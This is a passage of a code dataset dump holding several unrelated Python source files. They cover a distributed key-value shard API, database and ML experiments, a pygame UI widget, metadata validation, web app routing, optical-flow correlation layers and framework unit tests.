(Again, the same one you pass into VIEW)\n# {“result” : “Success”,\n# “members”: “176.32.164.2:8080,176.32.164.3:8080”},\n# Status = 200\n# If the <shard_id> is invalid, please return:\n# {“result”: “Error”,\n# “msg”: “No shard with id <shard_id>”},\n# Status = 404\n\n\ndef get_members_in_ID(shards, id):\n response = {}\n status = 400\n members = shards.get_members_in_ID(int(id))\n if members != None:\n members = \",\".join(members)\n response = {\"result\": \"Success\", \"members\": members}\n status = 200\n else:\n response = {\"result\": \"Error\", \"msg\": \"No shard with id \" + str(id)}\n status = 404\n return JsonResponse(response, status=status)\n\n\n# GET /shard/count/<shard_id>\n# Should return the number of key-value pairs that shard is responsible for as an integer\n# {“result”: “Success”,\n# “Count”: <count>},\n# Status = 200\n# If the <shard_id> is invalid, please return:\n# {“result”: “Error”,\n# “msg”: “No shard with id <shard_id>”},\n# Status = 404\n\n\ndef get_key_count_of_ID(shards, store, id):\n # print(\"not implemented yet: \", id)\n status = 404\n response = {\"result\": \"Error\", \"msg\": \"No shard with id \" + str(id)}\n # if it is not our current shard, request to a node\n # in that shard for their store size\n # else, we're in right shard and just return our store size\n my_shard_id = int(shards.get_my_shard())\n if my_shard_id == int(id):\n status = 200\n response = {\"result\": \"Success\", \"Count\": store.length()}\n return JsonResponse(response, status=status)\n else:\n members = shards.get_members_in_ID(int(id))\n if members != None:\n random_ip = random.choice(members)\n url = \"http://\" + random_ip + \"/shard/count/\" + str(id)\n response = requests.get(url, data={})\n return JsonResponse(response.json(), status=response.status_code)\n return JsonResponse(response, status=status)\n","sub_path":"dsproj_app/api_functions/api_shard_handler.py","file_name":"api_shard_handler.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"624779486","text":"import pytest\nfrom src.database_manager import database_connection\nfrom src.config import db_conn\nimport mysql.connector\n\n\n@pytest.fixture()\ndef init_MyDB_connection():\n # establish connection to test database\n test_db_conn = dict(db_conn)\n test_db_conn['database'] = 'sanpster_remote_test'\n db = database_connection.MyDB(test_db_conn)\n\n yield db # perform tests on db object\n\n del db # delete the database object\n\n@pytest.fixture()\ndef init_query_connection_collapse(init_MyDB_connection):\n db = init_MyDB_connection\n db.query('drop table if exists pet')\n\n test_db_conn = dict(db_conn)\n\n cnx = mysql.connector.connect(**test_db_conn)\n cursor = cnx.cursor(buffered=True)\n\n # simulate the server terminating the\n # database connection\n cursor.execute('kill {}'.format(db.database_connection.connection_id))\n cnx.commit()\n\n yield db\n\n db.query('drop table pet')\n cursor.close() # close the cursor\n cnx.close() # close the database connection\n\n\n\n\n\n\n\n\n","sub_path":"application/src/test_pkg/unit/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"292272648","text":"import numpy as np\nimport scipy\nfrom sklearn import datasets\nfrom sklearn import naive_bayes\nfrom sklearn import svm\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import classification\nimport operator\nimport matplotlib.pyplot as
plt\n\n\ndigits = datasets.load_digits()\nrng = np.random.RandomState(0)\nindices = np.arange(len(digits.data))\nrng.shuffle(indices)\n\nSLICE = 50\n\ntrain_index = indices[:SLICE]\ntest_index = indices[-8*SLICE:]\n\nx_test = digits.data[test_index]\ny_true = digits.target[test_index]\n\nplt.figure(1)\nplt_x = []\nplt_y = []\n\nfor index in range(10):\n x = digits.data[train_index]\n y = digits.target[train_index]\n\n plt_x.append(len(train_index))\n\n gnb = naive_bayes.GaussianNB()\n #gnb = svm.SVC()\n gnb.fit(x, y)\n result = gnb.predict(x_test)\n num = (result != y_true).sum()\n #plt_y.append(1-num/len(test_index))\n plt_y.append(classification.precision_score(y_true, result))\n print(classification_report(y_true, result))\n print(classification.accuracy_score(y_true, result))\n print(classification.precision_score(y_true, result))\n print(\"%d\" %(index))\n train_index = indices[:int(len(train_index)+SLICE/2)]\n\nprint(plt_y)\nplt.plot(plt_x, plt_y)\nplt.ylim(0.3, 0.9)\nplt.show()","sub_path":"old/simpleGNB.py","file_name":"simpleGNB.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"247844584","text":"from .base_widget import BaseWidget\r\nfrom engine.globs import CUADRO, TEXT_FG, BOX_SEL_BACK, TEXT_SEL, BISEL_BG, CANVAS_BG\r\nfrom pygame import Rect, Surface, draw, font\r\nfrom engine.libs.textrect import render_textrect\r\n\r\n\r\nclass Boton(BaseWidget):\r\n img_pre = None\r\n img_dis = None\r\n\r\n comando = None\r\n pos = 0, 0\r\n\r\n timer = 0\r\n animar = False\r\n\r\n def __init__(self, parent, nombre, ancho_mod, comando, pos, texto=None):\r\n self.tipo = 'boton'\r\n self.comando = None\r\n self.direcciones = {}\r\n self.nombre = nombre\r\n if texto is None:\r\n sel, pre, uns, dis = self.crear(nombre, ancho_mod)\r\n else:\r\n sel, pre, uns, dis = self.crear(texto, ancho_mod)\r\n self.img_sel = sel\r\n self.img_pre = pre\r\n self.img_uns = uns\r\n self.img_dis = dis\r\n self.pos = pos\r\n super().__init__(parent, imagen=self.img_uns)\r\n self.rect = self.img_sel.get_rect(topleft=self.pos)\r\n\r\n self.comando = comando\r\n\r\n def ser_presionado(self):\r\n self.animar = True\r\n\r\n def ser_deshabilitado(self):\r\n self.image = self.img_dis\r\n self.enabled = False\r\n\r\n def ser_habilitado(self):\r\n self.image = self.img_uns\r\n self.enabled = True\r\n\r\n def mantener_presion(self):\r\n self.image = self.img_pre\r\n\r\n def liberar_presion(self):\r\n self.image = self.img_sel\r\n if self.enabled:\r\n self.comando()\r\n\r\n def presionar(self, lt):\r\n if self.enabled:\r\n self.timer += 1\r\n if self.timer <= lt:\r\n self.image = self.img_pre\r\n\r\n elif lt + 1 <= self.timer <= lt * 2:\r\n self.image = self.img_sel\r\n\r\n elif self.timer == lt * 2 + 1:\r\n self.comando()\r\n\r\n else:\r\n self.timer = 0\r\n self.animar = False\r\n\r\n def crear(self, texto, ancho_mod):\r\n ancho = CUADRO * ancho_mod\r\n\r\n rect = Rect((-1, -1), (ancho - 6, CUADRO - 6))\r\n\r\n cnvs_pre = Surface((ancho + 6, CUADRO + 6))\r\n cnvs_pre.fill(CANVAS_BG)\r\n cnvs_sel = cnvs_pre.copy()\r\n cnvs_uns = cnvs_pre.copy()\r\n cnvs_dis = cnvs_pre.copy()\r\n\r\n fnd_pre = self.create_sunken_canvas(ancho, CUADRO)\r\n fnd_uns = self.create_raised_canvas(ancho, CUADRO)\r\n\r\n for i in range(round((ancho + 6) / 3)):\r\n # dotted horizontal line, top\r\n draw.line(cnvs_sel, BOX_SEL_BACK, (i * 7, 0), ((i * 7) + 5, 0), 2)\r\n\r\n # dotted horizontal line, bottom\r\n draw.line(cnvs_sel, BOX_SEL_BACK,
(i * 7, CUADRO + 4), ((i * 7) + 5, CUADRO + 4), 2)\r\n\r\n for i in range(round((CUADRO + 6) / 3)):\r\n # dotted vertical line, left\r\n draw.line(cnvs_sel, BOX_SEL_BACK, (0, i * 7), (0, (i * 7) + 5), 2)\r\n\r\n # dotted vertical line, right\r\n draw.line(cnvs_sel, BOX_SEL_BACK, (ancho + 4, i * 7), (ancho + 4, (i * 7) + 5), 2)\r\n\r\n cnvs_sel.blit(fnd_uns, (3, 3))\r\n cnvs_uns.blit(fnd_uns, (3, 3))\r\n cnvs_dis.blit(fnd_uns, (3, 3))\r\n cnvs_pre.blit(fnd_pre, (3, 3))\r\n\r\n bold = font.Font('engine/libs/Verdanab.ttf', 16)\r\n fuente = font.Font('engine/libs/Verdana.ttf', 16)\r\n\r\n btn_sel = render_textrect(texto, bold, rect, TEXT_SEL, CANVAS_BG, 1)\r\n btn_uns = render_textrect(texto, fuente, rect, TEXT_FG, CANVAS_BG, 1)\r\n btn_dis = render_textrect(texto, fuente, rect, BISEL_BG, CANVAS_BG, 1)\r\n\r\n cnvs_uns.blit(btn_uns, (6, 6))\r\n cnvs_sel.blit(btn_sel, (6, 6))\r\n cnvs_pre.blit(btn_sel, (6, 6))\r\n cnvs_dis.blit(btn_dis, (6, 6))\r\n\r\n return cnvs_sel, cnvs_pre, cnvs_uns, cnvs_dis\r\n\r\n def __repr__(self):\r\n return self.nombre + ' _boton Sprite'\r\n\r\n def update(self):\r\n if self.animar:\r\n self.presionar(5)\r\n","sub_path":"engine/UI/widgets/_boton.py","file_name":"_boton.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"306410160","text":"from __future__ import print_function, division\nimport json\nfrom jsonschema import validate, RefResolver, Draft4Validator\nfrom os.path import join\n\nfrom object_concatenation import (concatenate_complete_object, get_ancestors, \n merge_dicts, ObjectConcatenationError)\nfrom file_management import get_schema_directory\nfrom schema_preprocessing import combine, local_validate\n\ndef concatenate_complete_appliance(appliance_obj, object_cache):\n parent_name = appliance_obj['parent']\n complete_appliance = concatenate_complete_object(parent_name, object_cache,\n child_object=appliance_obj).copy()\n ########################\n # Check subtype is valid\n subtype = complete_appliance.get('subtype')\n subtypes = complete_appliance.get('subtypes')\n if subtype and (not subtypes or subtype not in subtypes):\n msg = (\"'{}' is not a valid subtype for appliance '{}'\"\n .format(subtype, parent_name))\n raise ObjectConcatenationError(msg)\n\n ############################################\n # Remove properties not allowed in completed appliance object\n for property_to_remove in ['subtypes', 'all_allowed_components', 'do_not_inherit']:\n complete_appliance.pop(property_to_remove, None)\n\n # Instantiate components recursively\n components = complete_appliance.get('components', [])\n for i, component_obj in enumerate(components):\n component_obj = concatenate_complete_appliance(component_obj, object_cache)\n\n components[i] = component_obj\n if complete_appliance.get('categories'):\n merge_dicts(complete_appliance['categories'], \n component_obj.get('categories', {}))\n\n return complete_appliance\n\n\ndef validate_complete_appliance(complete_appliance):\n # Load appliance schema and combine all 'allOf' keys\n schema_filename = join(get_schema_directory(), 'appliance.json')\n appliance_schema = json.load(open(schema_filename))\n combine(appliance_schema)\n\n # Update the schema with additional properties from the appliance\n additional_properties = complete_appliance.pop('additional_properties', {})\n appliance_schema['properties'].update(additional_properties)\n\n # Validate\n local_validate(complete_appliance, appliance_schema)\n \n #
Validate each component recursively\n components = complete_appliance.get('components', [])\n for component_obj in components:\n validate_complete_appliance(component_obj)\n","sub_path":"nilm_metadata/appliance.py","file_name":"appliance.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"557246361","text":"from pyramid.config import Configurator\nfrom pyramid.httpexceptions import HTTPNotFound\n\nfrom dropbox import DropboxContainer\ndropbox_container = DropboxContainer()\n\nfrom pyramid.i18n import TranslationStringFactory\n_ = TranslationStringFactory('briefkasten')\n\n\ndef dropbox_factory(request):\n try:\n return dropbox_container.get_dropbox(request.matchdict['drop_id'])\n except KeyError:\n raise HTTPNotFound('no such dropbox')\n\n\ndef dropbox_editor_factory(request):\n dropbox = dropbox_factory(request)\n if dropbox.editor_token == request.matchdict['editor_token']:\n return dropbox\n else:\n raise HTTPNotFound('invalid editor token')\n\n\ndef german_locale(request):\n return 'de'\n\n\ndef main(global_config, **settings):\n \"\"\" Configure and create the main application. \"\"\"\n config = Configurator(settings=settings, locale_negotiator=german_locale)\n config.add_translation_dirs('briefkasten:locale')\n config.add_static_view('briefkasten/static/deform', 'deform:static')\n config.add_static_view('briefkasten/static', 'briefkasten:static')\n config.include('pyramid_deform')\n config.add_route('fingerprint', '/briefkasten/fingerprint')\n config.add_route('dropbox_form', '/briefkasten/submit')\n config.add_route('dropbox_editor', '/briefkasten/{drop_id}/{editor_token}', factory=dropbox_editor_factory)\n config.add_route('dropbox_view', '/briefkasten/{drop_id}', factory=dropbox_factory)\n config.scan()\n dropbox_container.init(settings)\n return config.make_wsgi_app()\n","sub_path":"src/briefkasten/briefkasten/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"535366904","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 12 11:48:05 2019\n\nDepth First Search algoritm\n\n@author: stvyh\n\"\"\"\n\ndef load_dict():\n tree={}\n tree['A']=['B','F']\n tree['B']=['C','D']\n tree['C']=[]\n tree['E']=['K']\n tree['F']=['G','I','J']\n tree['G']=[]\n tree['I']=['F']\n tree['D']=['E','H','J']\n tree['J']=[]\n tree['H']=['I']\n tree['K']=['H']\n \n return tree\n\ndef DFSearchPrt(node,goal,path,best_path,level,tree):\n level += 1\n wpath = path.copy()\n level_path = path.copy()\n test_path = None\n wpath.append(node)\n\n print()\n print((\" \" * (3*level+8) )[-(3*level+8):],node, ' above ',tree[node])\n print((\" \" * (3*level) )[-(3*level):],'level '+str(level)+' =============================================')\n print((\" \" * (3*level+5) )[-(3*level+5):],'-->node',node,'path start',wpath,level_path)\n print('level',level,'node',node,'path start',path)\n input('kuk')\n \n if node == goal: \n if len(best_path) > len(wpath): best_path=wpath.copy()\n print('mam ho!',wpath,level_path,best_path)\n# prev_node=None\n return (None,best_path) \n \n if tree[node] == []: \n print((\" \" * (3*level+5) )[-(3*level+5):],' ### nikam ###, node ',node, wpath )\n return (None,best_path)\n\n# \n# print((\" \" * (3*level+5) )[-(3*level+5):],' path appended ',node,' ===> ',path,level_path)\n# print((\" \" * (3*level+5) )[-(3*level+5):],' tree node',tree[node])\n\n i = 1\n for 
item in tree[node]:\n if not item in path:\n print()\n print((\" \" * (3*level+5) )[-(3*level+5):],' i:'+str(i)+' for item',item,'tree node',tree[node])\n i += 1\n test_path,best_path=DFSearch(item,goal,wpath,best_path,level,tree)\n if test_path != None:\n wpath = test_path.copy()\n if test_path == None: path = level_path.copy() #pre_path\n return (level_path,best_path)\n\ndef DFSearch(node,goal,path,best_path,tree):\n wpath = path.copy()\n level_path = path.copy()\n test_path = None\n wpath.append(node)\n \n if node == goal: \n if len(best_path) > len(wpath): best_path=wpath.copy()\n print(best_path)\n return (None,best_path) \n \n if tree[node] == []: \n return (None,best_path)\n\n for item in tree[node]:\n if not item in path:\n test_path,best_path=DFSearch(item,goal,wpath,best_path,tree)\n if test_path != None:\n wpath = test_path.copy()\n if test_path == None: path = level_path.copy() #pre_path\n return (level_path,best_path)\n\ntree = load_dict()\npath =[]\nbest_path=[]\nprint('Candidates:') \npath, best_path = DFSearch('A','J',path,['X' for i in range(0,100)],tree)\nprint('=====================================')\nprint('The best one is:', best_path)\n \n\n","sub_path":"Examples/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"217837153","text":"import pyrebase\nimport requests\nimport os\nfrom central.log import log\nfrom central.models import Configuracoes\nfrom central.util import check_host\n\nclass ConectaFirebase:\n auth = None\n db = None\n _user = None\n _token = None\n\n def __init__(self):\n try:\n if(check_host()==False):\n log('CFB01.0',\"Sem conexão\")\n return None\n cfg = Configuracoes.objects.get()\n config = {\n \"apiKey\": \"AIzaSyCaYACeZvP5sW7MHKA5co7PttejxUxnTTM\",\n \"authDomain\": \"testes-apisensores.firebaseapp.com\",\n \"databaseURL\": \"https://testes-apisensores.firebaseio.com\",\n \"storageBucket\": \"testes-apisensores.appspot.com\",\n \"messagingSenderId\": \"475937382333\",\n \"serviceAccount\": os.path.dirname(os.path.abspath(__file__)) + '/testes-apiSensores-cba45d38c53e.json'\n }\n firebase = pyrebase.initialize_app(config)\n # Get a reference to the auth service\n ConectaFirebase.auth = firebase.auth()\n # Get a reference to the database service\n ConectaFirebase.db = firebase.database()\n except Exception as e:\n log('CFB01.1',str(e))\n return None\n \n def getUser():\n try:\n cfg = Configuracoes.objects.get()\n if(ConectaFirebase._token==None): \n # ConectaFirebase._token= ConectaFirebase.auth.create_custom_token(cfg.uidCentral)\n ConectaFirebase._token= ConectaFirebase.auth.create_custom_token('-KbztEuoaYejBSl-nyFx')\n ConectaFirebase._user = ConectaFirebase.auth.sign_in_with_custom_token(ConectaFirebase._token)\n return ConectaFirebase._user\n except requests.exceptions.HTTPError as e:\n e = eval(e.strerror)\n log('CFB01.2',e['error']['message'])\n ConectaFirebase._token = None\n return False\n except Exception as e:\n log('CFB01.3',str(e))\n ConectaFirebase._token = None\n return False\n","sub_path":"interface/central/firebase/conectaFirebase.py","file_name":"conectaFirebase.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"515856805","text":"# -*- mode:python; coding:utf-8 -*-\n\n# Copyright (c) 2020 IBM Corp. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for trestle elements module.\"\"\"\nfrom datetime import datetime\nfrom typing import List\n\nfrom trestle.core.err import TrestleError\nfrom trestle.core.models.elements import Element, ElementPath\nfrom trestle.oscal import target\n\n\ndef test_element_get_at(sample_target: target.TargetDefinition):\n \"\"\"Test element get method.\"\"\"\n element = Element(sample_target)\n\n assert element.get() == sample_target\n assert element.get_at() == element.get()\n assert element.get_at(ElementPath('metadata')) == sample_target.metadata\n assert element.get_at(ElementPath('metadata.title')) == sample_target.metadata.title\n assert element.get_at(ElementPath('targets')) == sample_target.targets\n assert element.get_at(ElementPath('targets.*')) == sample_target.targets\n assert element.get_at(ElementPath('metadata.parties.*')) == sample_target.metadata.parties\n assert element.get_at(ElementPath('metadata.parties.0')) == sample_target.metadata.parties[0]\n assert element.get_at(ElementPath('metadata.parties.0.uuid')) == sample_target.metadata.parties[0].uuid\n\n # invalid indexing\n assert element.get_at(ElementPath('metadata.title.0')) is None\n\n\ndef test_element_set_at(sample_target: target.TargetDefinition):\n \"\"\"Test element get method.\"\"\"\n element = Element(sample_target)\n\n metadata = target.Metadata(\n **{\n 'title': 'My simple catalog',\n 'last-modified': datetime.now(),\n 'version': '0.0.0',\n 'oscal-version': '1.0.0-Milestone3'\n }\n )\n\n title: target.Title = target.Title(__root__='TEST')\n\n parties: List[target.Party] = []\n parties.append(\n target.Party(**{\n 'uuid': 'ff47836c-877c-4007-bbf3-c9d9bd805000', 'party-name': 'TEST1', 'type': 'organization'\n })\n )\n parties.append(\n target.Party(**{\n 'uuid': 'ee88836c-877c-4007-bbf3-c9d9bd805000', 'party-name': 'TEST2', 'type': 'organization'\n })\n )\n\n assert element.set_at(ElementPath('metadata'), metadata).get_at(ElementPath('metadata')) == metadata\n assert element.set_at(ElementPath('metadata.title'), title).get_at(ElementPath('metadata.title')) == title\n\n assert element.set_at(ElementPath('metadata.parties'), parties).get_at(ElementPath('metadata.parties')) == parties\n assert element.set_at(ElementPath('metadata.parties.*'), parties).get_at(ElementPath('metadata.parties')) == parties\n\n # unset\n assert element.set_at(ElementPath('metadata.parties'), None).get_at(ElementPath('metadata.parties')) is None\n\n # string element path\n assert element.set_at('metadata.parties', parties).get_at(ElementPath('metadata.parties')) == parties\n\n try:\n assert element.set_at(ElementPath('metadata.title'), parties).get_at(ElementPath('metadata.parties')) == parties\n except TrestleError:\n pass\n\n # wildcard requires it to be an OscalBaseModel or list\n try:\n assert element.set_at(ElementPath('metadata.parties.*'), 'INVALID')\n except TrestleError:\n pass\n\n # invalid attribute\n try:\n assert element.set_at(ElementPath('metadata.groups.*'), 
parties)\n except TrestleError:\n pass\n\n\ndef test_element_str(sample_target):\n \"\"\"Test for magic method str.\"\"\"\n element = Element(sample_target)\n assert str(element) == 'TargetDefinition'\n","sub_path":"tests/trestle/core/models/element_test.py","file_name":"element_test.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"12485131","text":"import torch\nimport torch.nn.functional as F\nfrom utils.utils import bilinear_sampler, coords_grid\n\ntry:\n import alt_cuda_corr\nexcept:\n # alt_cuda_corr is not compiled\n pass\n\n\nclass CorrBlock:\n def __init__(self, fmap1, fmap2, num_levels=4, radius=4):\n self.num_levels = num_levels\n self.radius = radius\n self.corr_pyramid = []\n\n self.fmap1 = fmap1\n self.fmap2 = fmap2\n\n def corr(self, fmap1, fmap2, coords):\n\n B, D, H, W = fmap2.shape\n fmap1 = fmap1.unsqueeze(dim=-1)\n fmap2 = fmap2.unsqueeze(dim=-1)\n\n # map grid coordinates to [-1,1]\n xgrid, ygrid = coords.split([1,1], dim=-1)\n xgrid = 2*xgrid/(W-1) - 1\n ygrid = 2*ygrid/(H-1) - 1\n zgrid = torch.zeros_like(xgrid) - 1\n grid = torch.cat([zgrid, xgrid, ygrid], dim=-1)\n\n fmapw = F.grid_sample(fmap2, grid, align_corners=True)\n\n corr = torch.sum(fmap1*fmapw, dim=1)\n return corr / torch.sqrt(torch.tensor(D).float())\n\n def __call__(self, coords):\n\n r = self.radius\n coords = coords.permute(0, 2, 3, 1)\n batch, h1, w1, _ = coords.shape\n\n fmap1 = self.fmap1\n fmap2 = self.fmap2\n\n out_pyramid = []\n for i in range(self.num_levels):\n dx = torch.linspace(-r, r, 2*r+1)\n dy = torch.linspace(-r, r, 2*r+1)\n delta = torch.stack(torch.meshgrid(dy, dx), axis=-1).to(coords.device)\n\n centroid_lvl = coords.reshape(batch, h1, w1, 1, 2) / 2**i\n coords_lvl = centroid_lvl + delta.view(-1, 2)\n\n corr = self.corr(fmap1, fmap2, coords_lvl)\n fmap2 = F.avg_pool2d(fmap2, 2, stride=2)\n out_pyramid.append(corr)\n\n out = torch.cat(out_pyramid, dim=-1)\n return out.permute(0, 3, 1, 2).contiguous().float()\n\nclass CorrLayer(torch.autograd.Function):\n @staticmethod\n def forward(ctx, fmap1, fmap2, coords, r):\n fmap1 = fmap1.contiguous()\n fmap2 = fmap2.contiguous()\n coords = coords.contiguous()\n ctx.save_for_backward(fmap1, fmap2, coords)\n ctx.r = r\n corr, = correlation_cudaz.forward(fmap1, fmap2, coords, ctx.r)\n return corr\n\n @staticmethod\n def backward(ctx, grad_corr):\n fmap1, fmap2, coords = ctx.saved_tensors\n grad_corr = grad_corr.contiguous()\n fmap1_grad, fmap2_grad, coords_grad = \\\n correlation_cudaz.backward(fmap1, fmap2, coords, grad_corr, ctx.r)\n return fmap1_grad, fmap2_grad, coords_grad, None\n\n\nclass AlternateCorrBlock:\n def __init__(self, fmap1, fmap2, num_levels=4, radius=4):\n self.num_levels = num_levels\n self.radius = radius\n\n self.pyramid = [(fmap1, fmap2)]\n for i in range(self.num_levels):\n fmap1 = F.avg_pool2d(fmap1, 2, stride=2)\n fmap2 = F.avg_pool2d(fmap2, 2, stride=2)\n self.pyramid.append((fmap1, fmap2))\n\n def __call__(self, coords):\n\n coords = coords.permute(0, 2, 3, 1)\n B, H, W, _ = coords.shape\n\n corr_list = []\n for i in range(self.num_levels):\n r = self.radius\n fmap1_i = self.pyramid[0][0].permute(0, 2, 3, 1)\n fmap2_i = self.pyramid[i][1].permute(0, 2, 3, 1)\n\n coords_i = (coords / 2**i).reshape(B, 1, H, W, 2).contiguous()\n corr = alt_cuda_corr(fmap1_i, fmap2_i, coords_i, r)\n corr_list.append(corr.squeeze(1))\n\n corr = torch.stack(corr_list, dim=1)\n corr = corr.reshape(B, -1, H, W)\n return corr / 
16.0\n","sub_path":"core/corr.py","file_name":"corr.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"205598131","text":"#Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport unittest\nimport numpy as np\nimport paddle.fluid as fluid\nimport paddle.fluid.layers as layers\nimport paddle.fluid.core as core\nfrom paddle.fluid import compiler, Program, program_guard\nfrom paddle.fluid.op import Operator\nfrom paddle.fluid.backward import append_backward\n\n\nclass TestLoDAppendAPI(unittest.TestCase):\n def test_api(self, use_cuda=False):\n main_program = Program()\n with fluid.program_guard(main_program):\n x = fluid.layers.data(name='x', shape=[6], dtype='float32')\n level = fluid.layers.data(\n name='level', shape=[3], dtype='int32', lod_level=0)\n result = fluid.layers.lod_append(x, level)\n\n x_i = np.array([1.0, 1.0, 1.0, 1.0, 1.0, 1.0]).astype(\"float32\")\n level_i = np.array([0, 2, 6]).astype(\"int32\")\n\n for use_cuda in [False, True]:\n if use_cuda and not fluid.core.is_compiled_with_cuda():\n return\n place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()\n exe = fluid.Executor(place)\n [out] = exe.run(fluid.default_main_program(),\n feed={'x': x_i,\n 'level': level_i},\n fetch_list=[result],\n return_numpy=False)\n self.assertEqual(out.recursive_sequence_lengths(), [[2, 4]])\n\n\nclass TestLodAppendOpError(unittest.TestCase):\n def test_error(self):\n # The input(x) must be Variable.\n x1 = np.array([0.9383, 0.1983, 3.2, 1.2]).astype(\"float64\")\n level1 = [0, 2, 4]\n self.assertRaises(TypeError, fluid.layers.lod_append, x1, level1)\n\n #The input(level) must be Variable or list.\n x2 = fluid.layers.data(name='x2', shape=[4], dtype='float32')\n self.assertRaises(ValueError, fluid.layers.lod_append, x2, 2)\n\n # Input(x) dtype must be float32 or float64 or int32 or int64\n for dtype in [\"bool\", \"float16\"]:\n x3 = fluid.layers.data(name='x3_' + dtype, shape=[4], dtype=dtype)\n level3 = fluid.layers.data(\n name='level3' + dtype, shape=[4], dtype='int32', lod_level=2)\n self.assertRaises(TypeError, fluid.layers.lod_append, x3, level3)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"python/paddle/fluid/tests/unittests/test_lod_append_op.py","file_name":"test_lod_append_op.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"210959547","text":"\"\"\"Gets the data from the database and creates\nmetadata. 
In this instance, it looks for bad\nhdop and saves the results in a csv-file.\n\"\"\"\n\nimport math\nimport csv\nimport psycopg2\n\nDATABASE = \"project56web\"\nUSERNAME = \"postgres\"\nHOSTNAME = \"localhost\"\nPASSWORD = \"abcdef\"\n\nCONNECTION = None\n\n\ndef connect_database():\n \"\"\"Connects to the database\n :return connection: the connection\n \"\"\"\n\n input_string = \"dbname='{0}' user='{1}' host='{2}' password='{3}'\"\n format__string = input_string.format(DATABASE, USERNAME, HOSTNAME, PASSWORD)\n connection = psycopg2.connect(format__string)\n return connection\n\n\ndef get_bad_hdop(connection):\n \"\"\"Gets the bad HDOPs from the database\n makes a csv file for all the bad locations\n\n :param connection: a connection to the database\n \"\"\"\n\n get_hdop_string = \"SELECT * FROM positions WHERE hdop > 5 AND quality != 'DrOnly';\"\n radius = 100\n name = \"badhdop\"\n top_row = [\"rdx\", \"rdy\", \"radius\", \"quality\", \"amount\"]\n\n cur = connection.cursor()\n cur.execute(get_hdop_string)\n results = cur.fetchall()\n cur.close()\n\n #So many problem results!\n print(\"All results: \" + str(len(results)))\n\n problem_range = [[results[0][2], results[0][3], 100, results[0][8], 1]]\n\n for result in results:\n in_radius = False\n result_positions = [result[2], result[3]]\n\n for problem in problem_range:\n problem_positions = [problem[0], problem[1]]\n\n if calculate_in_range(result_positions, problem_positions, radius):\n in_radius = True\n new_problem_type = True\n\n for i in range(0, len(problem)):\n if problem[i] == result[8]:\n problem[i + 1] = str(int(problem[i + 1]) + 1)\n new_problem_type = False\n break\n\n if new_problem_type:\n problem.append(result[8])\n problem.append(1)\n\n break\n\n if not in_radius:\n problem_range.append([result[2], result[3], radius, result[8], 1])\n\n #So many unique problem results!\n print(\"Unique results: \" + str(len(problem_range)))\n create_csv(name, top_row, problem_range)\n\n\ndef calculate_in_range(first_pos, second_pos, radius):\n \"\"\"Calculates the distance from 2 objects and return True if they\n are in range\n\n :param first_pos: a list of the x and y positions\n :param second_pos: a list of the x and y positions to compare to\n :param radius: these two objects must be within this range\n :return: returns True if they are in range\n \"\"\"\n x_distance = math.pow(first_pos[0] - second_pos[0], 2)\n y_distance = math.pow(first_pos[1] - second_pos[1], 2)\n total_distance = math.sqrt(x_distance + y_distance)\n return total_distance < radius\n\n\ndef create_csv(name, top_row, data):\n \"\"\"Creates csv file\n\n :param name: name of the csv\n :param top_row: what has to be displayed on the top row\n :param data: data to insert\n \"\"\"\n csvname = name + \".csv\"\n with open(csvname, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(top_row)\n\n for row in data:\n writer.writerow(row)\n\n\nif __name__ == \"__main__\":\n CONNECTION = connect_database()\n get_bad_hdop(CONNECTION)\n CONNECTION.close()\n","sub_path":"pythonspul/metadata2.py","file_name":"metadata2.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"233516334","text":"\nimport tensorflow as 